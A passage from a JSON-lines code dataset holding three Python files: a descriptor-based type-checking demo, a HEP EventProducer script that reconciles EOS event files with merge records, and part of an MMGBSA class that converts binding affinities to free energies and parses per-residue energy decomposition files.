collections.abc import Callable\n\n\nclass Spec:\n    \"\"\" Specs are to be used with Layer class because otherwise we have no __spec__ vars\n\n\n    There is also a library called traits\n    https://pypi.org/project/traits/\n\n    there 
should be more than one library that does this\n\n    This is a good post about API design\n    https://stackoverflow.com/questions/40584140/maximum-recursion-depth-exceeded-when-using-a-class-descriptor-with-get-and-set\n    \"\"\"\n\n    def __init__(self, types=object, required=False, forward=False):\n        self.types = types\n        self.required = required\n        self.forward = forward\n        self.cls = None\n\n    def __get__(self, instance, cls):\n        print('Retrieving', self.name)\n        print('obj type ', cls)\n        # triggered when we retrieve the descriptor from the class directly\n        if instance is None:\n            print(\"none instance for \", self.name)\n            return self\n        try:\n            return instance.__dict__[self.name]\n        except KeyError:\n            raise AttributeError(self.name)\n\n    def __set__(self, instance, value):\n        if not isinstance(value, self.types):\n            raise TypeError(\"{name} has type {t}: received value of type {wrong_t}\".format(name=self.name,\n                                                                                           t=self.types,\n                                                                                           wrong_t=type(value)))\n\n        print('Updating', self.name)\n        instance.__dict__[self.name] = value\n\n    # this lets us know the name of the attribute the descriptor is assigned to\n    # owner is the class object where the descriptor is defined\n    # this is called when a new descriptor is created\n    def __set_name__(self, cls, name):\n        # print(\"the name of the attribute is \", name)\n        # print(cls)\n        self.name = name\n        self.cls = cls\n        if not hasattr(cls, \"__spec__\"):\n            cls.__spec__ = set()\n\n        def _spec(): return {s.name: s for s in cls.__spec__}\n\n        cls._spec = _spec\n        cls.__spec__.add(self)\n\n    def __delete__(self, instance):\n        del instance.__dict__[self.name]\n\n\nclass A:\n    spec1 = Spec((int, str), required=True)\n    spec2 = Spec((str, float))\n\n\nclass B(A):\n    spec3 = Spec()\n\n\nclass C(B, A):  # B must precede its parent A, otherwise the MRO is inconsistent\n    reset = Spec(Callable)\n\n    # note: the plain function below shadows the Spec descriptor of the same name\n    def reset(self):\n        print(\"resetting some shit\")\n\n\na = A()\nb = B()\n\na.spec1 = 3\na.spec1 = \"hello\"\n# a.spec2 = 3\n\nprint(a.__spec__)\nprint(A.__spec__)\n\nprint(\"B spec: \", B.__spec__)\nprint(B.spec3)\nprint(B.spec3.cls)\nprint(A.spec2.cls)\nprint(B.spec1.cls)\n\nprint(B._spec())\ns = B._spec()\nprint(\"spec6\" in s)\n# print(getattr(A, \"spec1\"))\n# print(getattr(a, \"spec1\"))\n# a.spec1_2 = 2\n\n# print(a.spec1_2)\n","repo_name":"davidenunes/deepsign","sub_path":"examples/descriptor_examples.py","file_name":"descriptor_examples.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3196083820","text":"import glob, os, sys\nimport ROOT as r\nimport yaml\nimport EventProducer.common.utils as ut\n\nclass checker_eos():\n\n#__________________________________________________________\n    def __init__(self, indirafs, indireos, process):\n        self.process = process\n        self.indirafs = indirafs\n        self.indireos = indireos\n\n\n#__________________________________________________________\n    def touch(self, path):\n        with open(path, 'a'):\n            os.utime(path, None)\n\n#__________________________________________________________\n    def check(self, para):\n\n        #ldir=[x[0] for x in os.walk(self.indir)]\n        print(self.indireos)\n        ldir=next(os.walk(self.indireos))[1]\n        \n        if not ut.testeos(para.eostest,para.eostest_size):\n            print ('eos seems to have problems, should check, will exit')\n            sys.exit(3)\n        dic={}\n        for l in ldir:\n            if self.process!='' and self.process!=l: \n                continue\n            #continue if process has been checked\n            if l=='BADPYTHIA' or l=='lhe' or l==\"__restored_files__\" or l==\"backup\": continue\n            print ('--------------------- 
',l)\n            proc=l\n            nfileseos=0\n            if os.path.isdir('%s/%s'%(self.indireos,proc)):\n                listeos = [x for x in os.listdir('%s/%s'%(self.indireos,proc)) if 'events' in x]\n                nfileseos=len(listeos)\n            if nfileseos==0: continue\n            nfilesmerged=0\n            mergefile=self.indirafs+'/'+l+'/merge.yaml'\n            print(\"mergefile=\",mergefile)\n            if not ut.file_exist(mergefile): \n                if not ut.dir_exist('%s/%s'%(self.indirafs,proc)):\n                    os.system('mkdir -p %s/%s'%(self.indirafs,proc))\n                self.touch('%s/%s/check'%(self.indirafs,proc))\n                continue\n\n            if not os.path.isdir(self.indirafs):\n                os.system('mkdir %s'%self.indirafs)\n\n            tmpf=None\n            with open(mergefile, 'r') as stream:\n                try:\n                    tmpf = yaml.load(stream, Loader=yaml.FullLoader)\n                except yaml.YAMLError as exc:\n                    print(exc)\n\n            bad_tot=tmpf['merge']['nbad']\n            files_tot=tmpf['merge']['ndone']\n\n            ntot_files=bad_tot+files_tot\n            print (\"tot files \",ntot_files,\" files eos \",nfileseos)\n            dic[proc]={'neos':nfileseos,'nmerged':ntot_files}\n            print ('%s/%s/check'%(self.indirafs,proc))\n            if ntot_files != nfileseos:\n                os.system('rm %s/%s/events*.yaml'%(self.indirafs,proc))\n                os.system('rm %s/%s/merge.yaml'%(self.indirafs,proc))\n            else:\n                if ut.file_exist('%s/%s/check'%(self.indirafs,proc)):\n                    os.system('rm %s/%s/check'%(self.indirafs,proc))\n        \n        outfile=self.indirafs+'/files.yaml'\n        with open(outfile, 'w') as outyaml:\n            yaml.dump(dic, outyaml, default_flow_style=False) \n        \n        \n","repo_name":"HEP-FCC/EventProducer","sub_path":"common/checker_eos.py","file_name":"checker_eos.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74932090009","text":"from operator import itemgetter\r\nfrom scipy import stats\r\nfrom .global_fun import *\r\nfrom sklearn.preprocessing import minmax_scale\r\n\r\nfrom .utils.print_functions import Debuginfo\r\n\r\n\r\nclass MMGBSA:\r\n    \r\n    def __init__(self, total_contr_thres=0.0, stdev_contr_thres=0.0):\r\n        # TOTAL_CONTRIBUTION_THRESHOLD = 0.01\r\n        # STDEV_CONTRIBUTION_THRESHOLD = 0.1\r\n        self.TOTAL_CONTRIBUTION_THRESHOLD = total_contr_thres\r\n        self.STDEV_CONTRIBUTION_THRESHOLD = stdev_contr_thres\r\n        code3 = [\"ALA\", \"ARG\", \"ASN\", \"ASP\", \"CYS\", \"GLU\", \"GLN\", \"GLY\", \"HIS\", \"ILE\", \"LEU\", \"LYS\", \"MET\", \"PHE\", \"PRO\", \"SER\", \"THR\", \"TRP\", \"TYR\", \"VAL\"]\r\n        code1 = [\"A\", \"R\", \"N\", \"D\", \"C\", \"E\", \"Q\", \"G\", \"H\", \"I\", \"L\", \"K\", \"M\", \"F\", \"P\", \"S\", \"T\", \"W\", \"Y\", \"V\"]\r\n        self.aa1to3_dict = dict((c1,c3) for c1,c3 in zip(code1,code3))\r\n        self.aa3to1_dict = dict((c3,c1) for c3,c1 in zip(code3,code1))\r\n        self.LIG_resid = None # the resid of the ligand as string\r\n        self.resid2residue_dict = {}\r\n        self.include_skewness = False\r\n        \r\n        # Just for information purposes (never used in the code)\r\n        self.headers = ['Resid 1', 'Resid 2',\r\n                        'Internal mean', 'Internal stdev', 'Internal stderr',\r\n                        'van der Waals mean', 'van der Waals stdev', 'van der Waals stderr',\r\n                        'Electrostatic mean', 'Electrostatic stdev', 'Electrostatic stderr',\r\n                        'Polar Solvation mean', 'Polar Solvation stdev', 'Polar Solvation stderr',\r\n                        'Non-Polar Solv. 
stderr',\r\n 'TOTAL mean', 'TOTAL stdev', 'TOTAL stderr']\r\n self.compound_residue_LIG_decompositionArray_mdict = tree() # only this dict has non-zero values\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict = tree() # like above but with per frame decomposition\r\n \r\n @staticmethod\r\n def Ki2DeltaG(y, RT=0.5957632602, scale=False, original=False):\r\n \"\"\"\r\n Convert Ki,IC50,Kd or EC50 values to pseudoenergies. y can be a list or an array. The affinities must be in uM!\r\n :param y:\r\n :param RT:\r\n :param scale:\r\n :param original: calculate correct DeltaGs, not pseudovalues for favorable training.\r\n :return:\r\n \"\"\"\r\n from sklearn.preprocessing import minmax_scale\r\n\r\n if original:\r\n denominator = 1e6\r\n else:\r\n denominator = 1e2\r\n\r\n if type(y) == float:\r\n return RT*np.log(float(y/denominator))\r\n else:\r\n new_y = []\r\n for v in y:\r\n new_y.append(RT*np.log(float(v/denominator))) # the v must be in uM!!! ; original implementation is with v/1e6!\r\n \r\n if scale:\r\n new_y = minmax_scale(new_y, feature_range=(-1.0, 0.0)).tolist() # in this range the MLPs perform best\r\n \r\n return np.array(new_y)\r\n \r\n @staticmethod\r\n def DeltaG2Kd(y, RT=0.5957632602, scale=False, original=True):\r\n \"\"\"\r\n Convert Free Energies in Kcal/mol back to binding affinities in uM. I presume that the energies were calculated\r\n from affinities expressed in uM!\r\n :param y:\r\n :param RT:\r\n :param scale:\r\n :param original: True if the scale of the input DeltaG is in the original values. False if DeltaG was generated with\r\n Ki2DeltaG(original=False)\r\n :return :\r\n \"\"\"\r\n from sklearn.preprocessing import minmax_scale\r\n if original:\r\n exponent = 1e6\r\n else:\r\n exponent = 1e2\r\n\r\n if isinstance(y, (float, np.floating)):\r\n return np.exp(float(y)/RT)*exponent\r\n else:\r\n new_y = []\r\n for e in y:\r\n new_y.append(np.exp(float(e)/RT)*exponent) # original implementation is with *1e6\r\n \r\n if scale:\r\n new_y = minmax_scale(new_y, feature_range=(-1.0, 0.0)).tolist() # in this range the MLPs perform best\r\n \r\n return np.array(new_y)\r\n\r\n @staticmethod\r\n def KJoule2Kcal(y):\r\n \"\"\"\r\n Method to convert KJ/mol to Kcal/mol.\r\n :return:\r\n \"\"\"\r\n if type(y) in [float, int]:\r\n return y*0.238846\r\n else:\r\n return [e*0.238846 for e in y]\r\n\r\n @staticmethod\r\n def logIt(y, minus=True):\r\n \"\"\"\r\n use minus=True for Inhibitions and minus=False for Activities.\r\n \"\"\"\r\n y = np.array(y)\r\n if np.min(y) < 0: # shift the values to make them all positive\r\n y = y - np.min(y)\r\n if np.max(y) > 100:\r\n max_y = np.max(y)+1\r\n else:\r\n max_y = 101\r\n new_y = []\r\n for Inh in y:\r\n logitInh = Inh/(max_y-Inh) # convert the % inhibition values to logit\r\n new_y.append(logitInh)\r\n \r\n if minus:\r\n new_y = -1.0 * np.array(new_y)\r\n else:\r\n new_y = np.array(new_y)\r\n \r\n return new_y\r\n\r\n @staticmethod\r\n def Tm_to_DeltaG(y):\r\n \"\"\"\r\n Method that rescales Tm (or DeltaTm) to [-12, 0], which is the frequent range of deepScaffOpts score.\r\n :param y:\r\n :return:\r\n \"\"\"\r\n assert isinstance(y, (list, tuple, np.ndarray)), Debuginfo(\r\n \"ERROR: all Tm values from the same assays must be \"\r\n \"transformed to DeltaG together, not each one individually!\", fail=True)\r\n Tm = np.array(y)\r\n # return -12**(Tm/Tm.max()) ; # exponential scale\r\n return -12**(minmax_scale(Tm, feature_range=(0.7, 1.0))) ; # another exponential scale\r\n # return -1*np.exp(minmax_scale(Tm, 
feature_range=(0.0, 2.0)))-5 ; # yet another exponential scale\r\n        # return -12*((Tm-Tm.min())/Tm.max())-6 ; # linear scale to [-12,-5]\r\n        # return -5*minmax_scale(Tm)-6 ; # another linear scale to [-12,-5]\r\n\r\n    @staticmethod\r\n    def Tm_to_Kd(y):\r\n        return MMGBSA.DeltaG2Kd(MMGBSA.Tm_to_DeltaG(y))\r\n\r\n    @staticmethod\r\n    def transform2FE(molname_score_dict, FE=None, Kd=None):\r\n        \r\n        if FE:\r\n            refmolname = FE.split()[0].lower()\r\n            refFE = float(FE.split()[1])\r\n        elif Kd:\r\n            refmolname = Kd.split()[0].lower()\r\n            refKd = float(Kd.split()[1]) # must be in uM\r\n            refFE = MMGBSA.Ki2DeltaG(refKd)\r\n        \r\n        refscore = molname_score_dict[refmolname]\r\n        scale_factor = refFE/refscore\r\n        for molname in list(molname_score_dict.keys()):\r\n            molname_score_dict[molname] *= scale_factor\r\n        \r\n        return molname_score_dict\r\n\r\n\r\n    def Inhibition2DeltaG(self, y, molnames_list, mode=1, ref_FE=None, ref_Kd=None):\r\n        \"\"\"\r\n        There are many ways to transform the Inhibition values.\r\n        preprocessing.scale(y)\r\n        preprocessing.minmax_scale(y, feature_range=(0, 1))\r\n        preprocessing.maxabs_scale(y)\r\n        preprocessing.robust_scale(y, with_centering=True, with_scaling=True, quantile_range=(25.0, 75.0))\r\n        \"\"\"\r\n        from sklearn.preprocessing import minmax_scale\r\n        from sklearn.preprocessing import maxabs_scale\r\n        from sklearn.preprocessing import scale\r\n        from sklearn.preprocessing import robust_scale\r\n        from sklearn.preprocessing import normalize\r\n        from sklearn.preprocessing import quantile_transform\r\n        \r\n        y = np.array(y)\r\n        if mode == 0:\r\n            title, new_y = 'no transformation', y\r\n        elif mode == 1:\r\n            title, new_y = 'standard scaling', -1.0 * scale(y)\r\n        elif mode == 2:\r\n            title, new_y = 'min-max scaling', -1.0 * minmax_scale(y, feature_range=(0, 0.8))\r\n        elif mode == 3:\r\n            title, new_y = 'max-abs scaling', -1.0 * maxabs_scale(y)\r\n        elif mode == 4:\r\n            title, new_y = 'robust scaling', [n[0] for n in -1.0 * robust_scale(y.reshape(-1,1), quantile_range=(25, 75))]\r\n        elif mode == 5:\r\n            title, new_y = 'quantile transformation (uniform pdf)', [n[0] for n in -1.0 * quantile_transform(y.reshape(-1,1), output_distribution='uniform')]\r\n        elif mode == 6:\r\n            title, new_y = 'quantile transformation (gaussian pdf)', [n[0] for n in -1.0 * quantile_transform(y.reshape(-1,1), output_distribution='normal')]\r\n        elif mode == 7:\r\n            title, new_y = 'sample-wise L2 normalizing', [n[0] for n in -1.0 * normalize(y.reshape(-1,1), axis=0)]\r\n        elif mode == 8:\r\n            title, new_y = 'logIt transformation', 1000 * self.logIt(y, minus=True)\r\n        elif mode == 9:\r\n            title, new_y = 'DeltaG transformation', self.Ki2DeltaG(1.0 / (y+1)) # y+1 to avoid division by zero\r\n        elif mode == 10:\r\n            title, new_y = 'DeltaG transformation', self.Ki2DeltaG(0.1 / (y+1)) # y+1 to avoid division by zero\r\n        elif mode == 11:\r\n            y2 = minmax_scale(y, feature_range=(0.001, 1000.0))\r\n            title, new_y = 'DeltaG transformation', self.Ki2DeltaG(1 / (y2+1)) # y2+1 to avoid division by zero\r\n        \r\n        new_y = list(new_y)\r\n        molname_score_dict = {}\r\n        for k,v in zip(molnames_list, new_y):\r\n            molname_score_dict[k] = v\r\n        if not (ref_FE or ref_Kd):\r\n            min_score = min(new_y) # the best score\r\n            min_indx = new_y.index(min_score)\r\n            refmolname = molnames_list[min_indx]\r\n            ref_FE = refmolname + \" -12.0\" # if not given, assume that the lowest free energy is -12 kcal/mol\r\n        \r\n        transformed_y = []\r\n        # molname_score_dict = self.transform2FE(molname_score_dict, FE=ref_FE, Kd=ref_Kd) \r\n        for molname in molnames_list:\r\n            
transformed_y.append(molname_score_dict[molname])\r\n        \r\n        print(\"Applying \" + title + \" to the percent Inhibition values.\")\r\n        return transformed_y\r\n    \r\n    \r\n    def Activity2DeltaG(self, ligand_Ki_dict, RT=0.5957632602):\r\n        # convert fractional activities (act in [0,1]) in place to pseudo-Ki values\r\n        for lig,act in list(ligand_Ki_dict.items()):\r\n            Ki = 1001-1000*act # if act=1 then Ki=1, else if act=0 then Ki=1001\r\n            ligand_Ki_dict[lig] = Ki\r\n        return ligand_Ki_dict\r\n    \r\n    \r\n    def read_decomposition_file(self, compound, decomposition_file):\r\n        \"\"\"\r\n        FUNCTION to read the MMGBSA energy decomposition file and populate the following dictionaries:\r\n        self.compound_residue_LIG_decompositionArray_mdict: # e.g. CHEMBL389589 -> Y90 -> array([[ 0., 0., 0.],\r\n       [-0.09816667, 0.00823441, 0.00336168],\r\n       [-0.10116667, 0.01739173, 0.00710014],\r\n       [-0.02983333, 0.02034221, 0.00830467],\r\n       [-0.014874, 0.0056095, 0.00229007],\r\n       [-0.24404067, 0.02109776, 0.00861312]])\r\n        These are: ['Internal mean', 'Internal stdev', 'Internal stderr',\r\n        'van der Waals mean', 'van der Waals stdev', 'van der Waals stderr',\r\n        'Electrostatic mean', 'Electrostatic stdev', 'Electrostatic stderr',\r\n        'Polar Solvation mean', 'Polar Solvation stdev', 'Polar Solvation stderr',\r\n        'Non-Polar Solv. mean', 'Non-Polar Solv. stdev', 'Non-Polar Solv. stderr',\r\n        'TOTAL mean', 'TOTAL stdev', 'TOTAL stderr']\r\n        self.contribution_dict: # e.g. Y90 -> (-0.24404066666666666, 0.021097757259218076, 0.0086131233336973357, 0.02510132318980977, 0.086451809640543831, 0.035293803493259335)\r\n        \"\"\"\r\n        \r\n        print(\"Reading compound\", compound, \" and decomposition file\", decomposition_file)\r\n        with open (decomposition_file, 'r') as f:\r\n            contents = f.readlines()\r\n        \r\n        #headers=contents[7].rstrip().split(\",\")\r\n        LIG_residue_decompositionArray_dict = {}\r\n        \r\n        # Read and save the side-chain DeltaG decomposition\r\n        start = contents.index(\"S,i,d,e,c,h,a,i,n, ,E,n,e,r,g,y, ,D,e,c,o,m,p,o,s,i,t,i,o,n,:\\r\\n\") + 3\r\n        prefix = \"sc_\"\r\n        for line in contents[start:]:\r\n            components = line.rstrip().split(\",\")\r\n            if len(components) != 20:\r\n                continue\r\n            # just to populate self.resid2residue_dict\r\n            residue1 = components[0] # e.g. 'ASP 98'\r\n            residue2 = components[1] # e.g. 
'ASP 98'\r\n            resid1 = residue1.split()[1]\r\n            resid2 = residue2.split()[1]\r\n            self.resid2residue_dict[resid1] = residue1\r\n            self.resid2residue_dict[resid2] = residue2\r\n            if \"LIG\" in residue1.split()[0] and not \"LIG\" in residue2.split()[0]:\r\n                self.LIG_resid = components[0].split()[1]\r\n                # print(\"DEBUG: components=\", components)\r\n                LIG_residue_decompositionArray_dict[prefix + residue2] = np.zeros((6,3))\r\n                row = -1\r\n                col = 0\r\n                for c in components[2:]:\r\n                    if col % 3 == 0:\r\n                        row +=1\r\n                        col = 0\r\n                    LIG_residue_decompositionArray_dict[prefix + components[1]][row, col] = float(c)\r\n                    col += 1\r\n            elif \"LIG\" in residue2.split()[0] and not \"LIG\" in residue1.split()[0]:\r\n                # print(\"DEBUG: components=\", components)\r\n                self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1] = np.zeros((6,3))\r\n                row = -1\r\n                col = 0\r\n                for c in components[2:]:\r\n                    if col % 3 == 0:\r\n                        row +=1\r\n                        col = 0\r\n                    self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1][row, col] = float(c)\r\n                    col += 1\r\n        \r\n        # Read and save the backbone DeltaG decomposition\r\n        start = contents.index(\"B,a,c,k,b,o,n,e, ,E,n,e,r,g,y, ,D,e,c,o,m,p,o,s,i,t,i,o,n,:\\r\\n\") + 3\r\n        prefix = \"bb_\"\r\n        for line in contents[start:]:\r\n            components = line.rstrip().split(\",\")\r\n            if len(components) != 20:\r\n                continue\r\n            # just to populate self.resid2residue_dict\r\n            residue1 = components[0] # e.g. 'ASP 98'\r\n            residue2 = components[1] # e.g. 'ASP 98'\r\n            resid1 = residue1.split()[1]\r\n            resid2 = residue2.split()[1]\r\n            self.resid2residue_dict[resid1] = residue1\r\n            self.resid2residue_dict[resid2] = residue2\r\n            if \"LIG\" in residue1.split()[0] and not \"LIG\" in residue2.split()[0]:\r\n                self.LIG_resid = components[0].split()[1]\r\n                # print(\"DEBUG: components=\", components)\r\n                LIG_residue_decompositionArray_dict[prefix + residue2] = np.zeros((6,3))\r\n                row = -1\r\n                col = 0\r\n                for c in components[2:]:\r\n                    if col % 3 == 0:\r\n                        row +=1\r\n                        col = 0\r\n                    LIG_residue_decompositionArray_dict[prefix + components[1]][row, col] = float(c)\r\n                    col += 1\r\n            elif \"LIG\" in residue2.split()[0] and not \"LIG\" in residue1.split()[0]:\r\n                # print(\"DEBUG: components=\", components)\r\n                self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1] = np.zeros((6,3))\r\n                row = -1\r\n                col = 0\r\n                for c in components[2:]:\r\n                    if col % 3 == 0:\r\n                        row +=1\r\n                        col = 0\r\n                    self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1][row, col] = float(c)\r\n                    col += 1\r\n        \r\n        \r\n        # print(\"DEBUG: LIG_residue_decompositionArray_dict=\", LIG_residue_decompositionArray_dict)\r\n        # CALCULATE PERCENT CONTRIBUTION OF EACH RESIDUE TO THE TOTAL ENERGY\r\n        residue_TOTAL_std_err_tuple_list = [(r, self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][0], self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][1], self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][2]) for r in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())]\r\n        residue_TOTAL_std_err_tuple_list.sort(key=itemgetter(1,3))\r\n        # print(residue_TOTAL_std_err_tuple_list)\r\n        TOTAL_ENERGY = 0\r\n        for q in residue_TOTAL_std_err_tuple_list:\r\n            TOTAL_ENERGY += q[1]\r\n        # print(\"TOTAL ENERGY=\", TOTAL_ENERGY)\r\n        self.residue_DeltaG_dict = {} # residue -> [total E, stdev, stderr]\r\n        self.residue_DeltaGcontribution_dict = {} # residue -> [total E contribution, stdev_contr, stderr_contr]\r\n        for q in 
residue_TOTAL_std_err_tuple_list:\r\n resname = q[0].split()[0]\r\n resid = q[0].split()[1]\r\n total_contr = np.divide(q[1], TOTAL_ENERGY)\r\n stdev_contr = np.divide(q[2], abs(q[1]))\r\n stderr_contr = np.divide(q[3], abs(q[1]))\r\n self.residue_DeltaG_dict[resname + resid] = [q[1], q[2], q[3]]\r\n self.residue_DeltaGcontribution_dict[resname + resid] = [q[1], q[2], q[3], total_contr, stdev_contr, stderr_contr]\r\n \r\n # # APPLY FILTERS TO THE TOTAL CONTRIBUTION AND TOTAL STDEV OF EACH RESIDUE\r\n # for c in contibution_dict:\r\n # if c[4] < TOTAL_CONTRIBUTION_THRESHOLD or c[5] > STDEV_CONTRIBUTION_THRESHOLD:\r\n # print(\"DEBUG: excluding \", c)\r\n # else:\r\n # print(c)\r\n \r\n \r\n def read_perframe_decomposition_file(self, compound, perframe_decomposition_file, include_skewness=False):\r\n \"\"\"\r\n FUNCTION to read the per-frame MMGBSA energy decomposition file and populate the following dictionary:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict: # e.g. CHEMBL389589 -> 3 -> Y90 -> [\r\n [0.0, 1.207, -6.483, -6.768, 7.2159552, -4.8280448],\r\n [0.0,-0.751,-6.509,-8.141,6.9924096,-8.4085904],\r\n [0.0,-0.358,-6.418,-7.064,7.1629488,-6.6770512],\r\n [0.0,0.639,-7.26,-7.322,7.1511264,-6.7918736],\r\n [0.0,-0.563,-7.883,-6.941,7.2378936000000005,-8.1491064],\r\n [0.0,-0.128,-7.305,-7.148,7.107314399999999,-7.4736856000000005],\r\n [0.0,-0.822,-5.277,-7.924,7.1322192,-6.8907808],\r\n [0.0,-1.075,-6.24,-8.215,7.0330032000000005,-8.496996800000002],\r\n ]\r\n The terms in the array are [Internal, van der Waals, Electrostatic, Polar Solvation, Non-Polar Solv., TOTAL], one for each frame.\r\n \"\"\"\r\n self.include_skewness = include_skewness\r\n \r\n print(\"Reading compound\", compound, \" and per-frame decomposition file\", perframe_decomposition_file)\r\n # print(\"DEBUG read_perframe_decomposition_file: self.compound_residue_LIG_decompositionArray_mdict[compound]=\", self.compound_residue_LIG_decompositionArray_mdict[compound])\r\n with open (perframe_decomposition_file, 'r') as f:\r\n contents = f.readlines()\r\n \r\n #headers=contents[7].rstrip().split(\",\")\r\n LIG_residue_decompositionArray_dict = {}\r\n \r\n # Read and save the backbone DeltaG per-frame decomposition\r\n start = contents.index(\"DELTA,Backbone Energy Decomposition:\\r\\n\") + 2\r\n prefix = \"bb_\"\r\n for line in contents[start:]:\r\n components = line.rstrip().split(\",\")\r\n if not len(components) == 9:\r\n break\r\n [frame, residue1, residue2, Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] = line.rstrip().split(',')\r\n residue1 = prefix + residue1\r\n residue2 = prefix + residue2\r\n # print(\"DEBUG: energy line=\", line)\r\n Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL = float(Internal), float(vdW), float(Elec), float(Pol_Solv), float(NonPola_Solv), float(TOTAL)\r\n # The values residue1,residue2 are slightly different than the values residue2,residue1, therefore they will be both stored and averaged at the end.\r\n if \"LIG\" in residue2 and not \"LIG\" in residue1:\r\n # print(\"DEBUG: components=\", components)\r\n # print(\"DEBUG: saving energies of residue1=\", residue1)\r\n if not residue1 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n else:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] 
)\r\n            if \"LIG\" in residue1 and not \"LIG\" in residue2:\r\n                # print(\"DEBUG: components=\", components)\r\n                # print(\"DEBUG: saving energies of residue2=\", residue2)\r\n                if not residue2 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n                    self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n                else:\r\n                    self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n        \r\n        # Read and save the side-chain DeltaG per-frame decomposition\r\n        start = contents.index(\"DELTA,Sidechain Energy Decomposition:\\r\\n\") + 2\r\n        prefix = \"sc_\"\r\n        for line in contents[start:]:\r\n            components = line.rstrip().split(\",\")\r\n            if not len(components) == 9:\r\n                break\r\n            [frame, residue1, residue2, Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] = line.rstrip().split(',')\r\n            residue1 = prefix + residue1\r\n            residue2 = prefix + residue2\r\n            # print(\"DEBUG: energy line=\", line)\r\n            Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL = float(Internal), float(vdW), float(Elec), float(Pol_Solv), float(NonPola_Solv), float(TOTAL)\r\n            # The values residue1,residue2 are slightly different than the values residue2,residue1, therefore they will be both stored and averaged at the end.\r\n            if \"LIG\" in residue2 and not \"LIG\" in residue1:\r\n                # print(\"DEBUG: components=\", components)\r\n                # print(\"DEBUG: saving energies of residue1=\", residue1)\r\n                if not residue1 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n                    self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n                else:\r\n                    self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n            if \"LIG\" in residue1 and not \"LIG\" in residue2:\r\n                # print(\"DEBUG: components=\", components)\r\n                # print(\"DEBUG: saving energies of residue2=\", residue2)\r\n                if not residue2 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n                    self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] 
stats.sem(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist(),\r\n stats.skew(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist()):\r\n # print(\"DEBUG: appending \", [mean, stdev, stderr, skewness], \" to residue \", residue, \" and compound \", compound)\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue].append( [mean, stdev, stderr, skewness] )\r\n # print(\"DEBUG: point 1.5 self.compound_residue_LIG_decompositionArray_mdict[compound][residue]=\", self.compound_residue_LIG_decompositionArray_mdict[compound][residue])\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue] = np.array(self.compound_residue_LIG_decompositionArray_mdict[compound][residue])\r\n # print(\"DEBUG: point 2 self.compound_residue_LIG_decompositionArray_mdict[compound]\", self.compound_residue_LIG_decompositionArray_mdict[compound])\r\n \r\n \r\n def get_MMGBSA_fp_term_decomposition(self, compound_list, scale=True, only_terms=True, get_reslist=False, binnedDeltaG=False,\r\n include_skewness=None):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints of all the compounds in compound_list. The fingerprint(will\r\n contain the values of the terms 'van der Waals mean', 'van der Waals stdev', 'Electrostatic mean', 'Electrostatic stdev',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Non-Polar Solv. mean', 'Non-Polar Solv. stdev' and optionally the 'Total DeltaG'\r\n and 'Total DeltaG stdev'.\r\n \r\n ARGS:\r\n only_terms: if True then only 'van der Waals mean', 'van der Waals stdev', 'Electrostatic mean', 'Electrostatic stdev',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Non-Polar Solv. mean', 'Non-Polar Solv. 
